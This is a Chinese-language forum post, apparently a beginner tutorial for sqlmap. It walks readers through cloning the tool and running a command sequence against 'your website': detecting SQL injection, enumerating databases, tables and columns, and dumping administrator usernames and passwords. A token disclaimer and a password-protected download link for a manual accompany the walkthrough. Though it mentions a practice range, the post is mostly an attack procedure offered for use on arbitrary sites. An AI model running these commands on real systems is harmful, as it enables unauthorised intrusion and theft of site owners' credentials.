首先,需要一个本期的主角:sqlmap[玫瑰][滑稽][玫瑰]
先声明一下,问问题可以,请好好看看帖子和置顶内容,没有的自然会回你,有的我就不管了[阴险]
再声明一下,一切违法违规行为与本人无关,请在下载24小时内删除
下载的命令
git clone https://github.com/sqlmapproject/sqlmap.git
下面的是给小白先了解一下的,会一点的可以往下翻(用的是靶场,违规不得已才改成这样[泪])
首先检测一个站点是否能进行sql注入
输入命令:(网址后面必须是什么什么等于一个数字例如id=1)
sqlmap -u “这里是你的网址” –batch
他就会自动扫描出现图4
就大概率代表可以注入
然后输入:
sqlmap -u “你的地址” –batch –dbs
看到像图5那样,然后输入以下命令
sqlmap -u “你的地址” –batch -D 随便选一个之前爆出来的库放在这里例如我之前的maoshe –tables
然后出现图6,这些是库里的表,然后输入命令
sqlmap -u “你的网址” –batch -D 看上次的解释 -T 这里填你要爆破的表名例如我的admin –columns
然后出现图7,这些就是具体的数据了
然后输入命令(进行爆破账号和密码)
sqlmap -u “你的网址” –batch -D 看上次的解释 -T 看上次的解释 -C username,password –dump
然后出现图8,这里就是管理员的账号和密码了(没爆破完,网不好[心碎])
这个是手册几乎包括所有sqlmap的使用方法
https://xsfzl.lanzoum.com/iCPKG05opuuf
密码:50s9
暂无评论内容